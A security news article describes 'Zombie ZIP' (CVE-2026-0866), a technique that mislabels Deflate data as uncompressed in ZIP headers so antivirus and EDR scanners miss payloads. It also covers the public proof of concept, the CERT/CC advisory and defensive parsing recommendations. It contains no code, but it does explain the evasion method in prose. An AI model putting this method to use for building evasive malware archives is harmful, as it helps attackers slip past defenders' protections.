A new attack technique against ZIP archives, dubbed Zombie ZIP, demonstrates how seemingly harmless file formats can be weaponised to deliver malware while slipping past antivirus and endpoint detection and response (EDR) tools. The method, presented by security researcher Chris Aziz from Bombadil Systems, exploits how many security solutions trust ZIP file headers instead of validating the actual data inside the archive.
What Is Zombie ZIP? ZIP Header Manipulation Explained
The ZIP format is one of the most widely used archive types, supported by virtually every modern operating system, mail server and file-sharing platform. Each ZIP file contains headers that describe the contents of the archive, including the compression method and CRC checksum used to verify data integrity.
Zombie ZIP abuses these headers to create a form of content–header confusion. In the attack, the archive’s Method field is set to 0 (STORED), which formally indicates that the data is stored uncompressed. In reality, the file data is still encoded using the Deflate compression algorithm.
Many antivirus and EDR engines assume the header is truthful. They attempt to scan the payload as if it were raw, uncompressed bytes. Because the data is actually compressed, the scanner sees only compressed “noise” rather than readable code or file structures. Signature-based detection, heuristic rules and even some machine-learning models are far less effective when the underlying data is not decoded correctly.
Why Standard ZIP Tools Fail While Malware Loaders Succeed
When a user or administrator tries to open such a Zombie ZIP archive with common tools like WinRAR, 7-Zip or the Unix unzip utility, the operation often fails. The tools may display errors, extract corrupted files or report an unsupported method. This behaviour stems from a deliberate mismatch between the CRC checksum stored in the header and the real compressed content inside the archive.
The checksum in a Zombie ZIP is calculated for the hypothetical uncompressed data described by the header, not for the actual Deflate-compressed payload. Standards-compliant tools therefore treat the archive as damaged or malformed and either refuse to extract it or mark the output as corrupt.
An attacker-controlled loader, however, can be written to ignore the declared compression method and interpret the data stream as Deflate regardless of what the header says. This custom loader can fully reconstruct the hidden payload and execute it. Meanwhile, many security products will have already logged the file as “scanned” and found nothing malicious, because they never decoded the content correctly.
Proof-of-Concept and Ease of Weaponisation
The researcher has released a proof-of-concept (PoC) implementation of Zombie ZIP on GitHub, including example archives and technical documentation of the approach. This lowers the barrier for threat actors, who no longer need deep expertise in the ZIP specification to adopt the technique.
Zombie ZIP can be integrated into phishing campaigns, malware downloaders and exploit kits. For example, a phishing email may carry a ZIP attachment that appears broken to end users and standard tools but extracts perfectly via the attacker’s loader after being dropped on the endpoint by another component in the infection chain.
CVE-2026-0866 and CERT/CC Assessment of the Zombie ZIP Vulnerability
The CERT Coordination Center (CERT/CC) has issued an advisory for this technique and assigned it the identifier CVE-2026-0866. According to CERT/CC, Zombie ZIP is a modern variation of older archive-processing weaknesses, similar in concept to CVE-2004-0935 that affected early versions of ESET antivirus more than two decades ago.
Importantly, CERT/CC emphasises that the ZIP standard itself is not inherently vulnerable. The core issue lies in how security products and extraction tools over-trust header information and sometimes fail to validate that the archive structure and data stream are consistent. Some contemporary decompression libraries already detect such inconsistencies and flag the file as malformed or suspicious, but coverage across the ecosystem is uneven.
Security Impact and Defensive Recommendations Against Zombie ZIP
For vendors of antivirus, EDR, secure email gateways and file analysis sandboxes, Zombie ZIP highlights the need for more robust archive parsing. Defensive measures should include at least the following:
1. Validate the declared compression method against the actual data stream. Engines should not only read the Method field but also attempt to parse the content accordingly. If the data behaves like Deflate while the header claims “stored”, this discrepancy should be treated as a strong indicator of potential abuse.
2. Enforce structural integrity checks for ZIP archives. Systematically verifying header fields, length values and CRC checksums can uncover anomalies typical of antivirus bypass and payload obfuscation strategies. Archives that do not pass consistency checks should be quarantined or blocked at gateways.
3. Use more aggressive multi-path scanning for high-risk channels. In environments such as email gateways, web proxies and download inspection points, it is advisable to attempt decompression using multiple strategies or libraries and compare the results. Although this adds computational overhead, it significantly reduces the attack surface for archive-based evasion techniques.
For enterprises and end users, Zombie ZIP is a reminder to treat ZIP archives from untrusted or unknown sources with caution. If an archive repeatedly throws errors like “unsupported method” or appears corrupted when opened with reputable tools, it should be deleted and, where possible, forwarded to the security team for deeper analysis rather than repeatedly “force-opened.” Hardening email policies, enforcing attachment scanning on gateways, and keeping security products updated with improved archive parsers are practical safeguards.
The emergence of Zombie ZIP underlines a broader lesson: blindly trusting file headers and formats can be exploited to undermine security controls. Organisations that proactively review how their tools handle archives, adopt stricter content validation and monitor for new evasion techniques like CVE-2026-0866 will be better positioned to contain archive-borne threats and maintain a resilient security posture.
